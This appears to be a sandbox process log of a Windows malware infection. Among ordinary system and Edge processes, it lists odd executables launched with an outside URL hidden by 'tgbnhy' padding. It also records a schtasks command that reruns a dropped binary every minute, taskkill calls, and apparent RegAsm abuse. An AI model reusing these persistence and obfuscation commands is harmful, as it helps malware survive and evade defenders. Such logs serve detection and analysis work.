C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1540 -ip 1540
1⤵
PID:4580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1412 -ip 1412
1⤵
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5100 -ip 5100
1⤵
PID:3396

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
1⤵
PID:3864

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjNEODNDNkQtQTI1RC00MjI1LUJCM0QtMDY1MkJFQjU4RkQ1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntDOTBEODk2My1DQzBGLTRFNUMtOUE5Ri0wMjY1MTE3MTEyM0V9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O3FXSlN6V3dQZmRjTFIrWEdJdjZ4clpmaVlPeGhQVTJzMU5XbWpXY2FGUGc9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBuZXh0dmVyc2lvbj0iMTA2LjAuNTI0OS4xMTkiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSI1IiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDIzNTA3MDAxIi8-PC9hcHA-PC9yZXF1ZXN0Pg
2⤵
PID:452

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\MicrosoftEdge_X64_114.0.1823.86.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\MicrosoftEdge_X64_114.0.1823.86.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
2⤵
PID:552

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\EDGEMITMP_E27B2.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\EDGEMITMP_E27B2.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{6D2411F1-A148-4969-BBE9-3EEACEE8FA6D}\MicrosoftEdge_X64_114.0.1823.86.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
3⤵
PID:1932

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MjNEODNDNkQtQTI1RC00MjI1LUJCM0QtMDY1MkJFQjU4RkQ1fSIgdXNlcmlkPSJ7NzhDN0Q1NTMtNEI2Ni00RTEzLUI0QTctNDNGOUM2Mzc1RkQyfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9Ins4MDBBNjNCNi0yNTJCLTQ2RjMtQUI3Ri0wMkRBNDEzNTQ3NEV9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiZxdW90O1ZQUW9QMUYrZnExNXdSemgxa1BMNFBNcFdoOE9STUI1aXp2ck9DL2NoalE9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IiIgbmV4dHZlcnNpb249IjExNC4wLjE4MjMuODYiIGxhbmc9IiIgYnJhbmQ9IiIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSItMSIgaW5zdGFsbGRhdGU9Ii0xIj48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9Ijc0MzUwNjkxNDkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NDM1MDY5MTQ5IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzcyMTcwODE2MyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmYudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNzVkNjkyYjQtNjUzYi00NTNjLWEzNjgtZDhiMThlYzZhZjI1P1AxPTE2OTA0NDM1MDcmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9R3NYdCUyZnNRa0FwS0hhdlV6Z05HRkkwRVUwdk5CMjRsMnM1bWw0MTNiR0dPMzJldmF6ZnMza2N4c0N1NDlxYUJ4cGV2eFoyZWdDaDAwbXVsTWxCN09sZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE0ODYzMjAwOCIgdG90YWw9IjE0ODYzMjAwOCIgZG93bmxvYWRfdGltZV9tcz0iMTg2MTciLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI3NzIyNDg5NDQyIiBzb3VyY2VfdXJsX2luZGV4PSIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNzc0NzgwMTkzMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjYwOSIgc3lzdGVtX3VwdGltZV90aWNrcz0iODA2OTI5MTU1NiIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjY1NiIgZG93bmxvYWRfdGltZV9tcz0iMjg2NjQiIGRvd25sb2FkZWQ9IjE0ODYzMjAwOCIgdG90YWw9IjE0ODYzMjAwOCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjAiIGluc3RhbGxfdGltZV9tcz0iMzIxNDkiLz48L2FwcD48L3JlcXVlc3Q-
2⤵
PID:5712

C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe
1⤵
PID:1032

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:9900

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\sefanathread"
2⤵
PID:2432

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
2⤵
PID:3976

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe'" /f
3⤵
- Creates scheduled task(s)
PID:6264

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe" "C:\Users\Admin\AppData\Roaming\sefanathread\sefanathread.exe"
2⤵
PID:5784

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\da533ce533774e8097dc7e08554728d6 /t 4412 /p 4920
1⤵
PID:3020

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2520

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5128

C:\Program Files (x86)\Neurobiological\theocracy.exe
"C:\Program Files (x86)\Neurobiological\theocracy.exe"
1⤵
PID:1052

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Ceaseless.exe
2⤵
- Kills process with taskkill
PID:6196

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Lashing.exe
2⤵
- Kills process with taskkill
PID:8892

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:5436

C:\Program Files (x86)\Neurobiological\Ceaseless.exe
"C:\Program Files (x86)\Neurobiological\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2948

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5384

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6128

C:\Users\Admin\AppData\Local\Temp\nsa55A5.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsa55A5.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:5272

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5424

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5692

C:\Users\Admin\AppData\Local\Lashing.exe
C:\Users\Admin\AppData\Local\Lashing.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3948

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tim94\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=114.0.1823.86 --initial-client-data=0x180,0x184,0x188,0x15c,0x194,0x7ffe21264210,0x7ffe21264220,0x7ffe21264230
1⤵
PID:6088

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x150 0x3cc
1⤵
PID:3280

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5880

C:\Program Files (x86)\Sewer\Ceaseless.exe
"C:\Program Files (x86)\Sewer\Ceaseless.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7072

C:\Program Files (x86)\Sewer\Lashing.exe
"C:\Program Files (x86)\Sewer\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3292

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6508

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7152

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:4488

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:5400

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:4748

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2072

C:\Users\Admin\AppData\Local\Temp\nst731C.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nst731C.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:7284

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:2148

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6408

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:3752

C:\Users\Admin\AppData\Local\Temp\nsvAAC6.tmp\Ceaseless.exe
C:\Users\Admin\AppData\Local\Temp\nsvAAC6.tmp\Ceaseless.exe ""tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB""
2⤵
PID:6240

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:3052

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:3632

C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe"
1⤵
PID:5916

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe" /Service /Protected
2⤵
PID:6448

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:5668

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6856

C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
"C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe"
1⤵
PID:6676

C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
"C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe"
2⤵
PID:9984

C:\Program Files (x86)\Caret\gridding.exe
"C:\Program Files (x86)\Caret\gridding.exe"
1⤵
PID:7592

C:\Users\Admin\AppData\Local\unproductive.exe
C:\Users\Admin\AppData\Local\unproductive.exe
1⤵
PID:5128

C:\Program Files (x86)\havre\Lashing.exe
"C:\Program Files (x86)\havre\Lashing.exe" "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7228

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=Lashing.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\tim70\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=0 --disable-features=MojoIpcz --mojo-named-platform-channel-pipe=7228.7532.17712185901395158848
2⤵
PID:8784

C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe
"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\tim70\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\tim70\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=114.0.5735.201 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\114.0.1823.86\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=114.0.1823.86 --initial-client-data=0x168,0x16c,0x170,0x144,0x1c0,0x7ffe21264210,0x7ffe21264220,0x7ffe21264230
3⤵
PID:8340

C:\Users\Admin\AppData\Local\Ceaseless.exe
C:\Users\Admin\AppData\Local\Ceaseless.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:7584

C:\Program Files (x86)\Neurobiological\conveyances.exe
"C:\Program Files (x86)\Neurobiological\conveyances.exe"
1⤵
PID:7964

C:\Users\Admin\AppData\Local\hcf.exe
C:\Users\Admin\AppData\Local\hcf.exe "tgbnhyhtgbnhyttgbnhyttgbnhyptgbnhy:tgbnhy/tgbnhy/tgbnhywtgbnhywtgbnhywtgbnhy.tgbnhyftgbnhyotgbnhyntgbnhyttgbnhyetgbnhyntgbnhyotgbnhyttgbnhystgbnhyutgbnhy.tgbnhyctgbnhyotgbnhymtgbnhy/tgbnhyzr2i0i2i3itgbnhy0v7v2zr0zrtgbnhyihtml93J9HtgbnhyQtZordWTPRtgbnhyngLnB"
1⤵
PID:6596

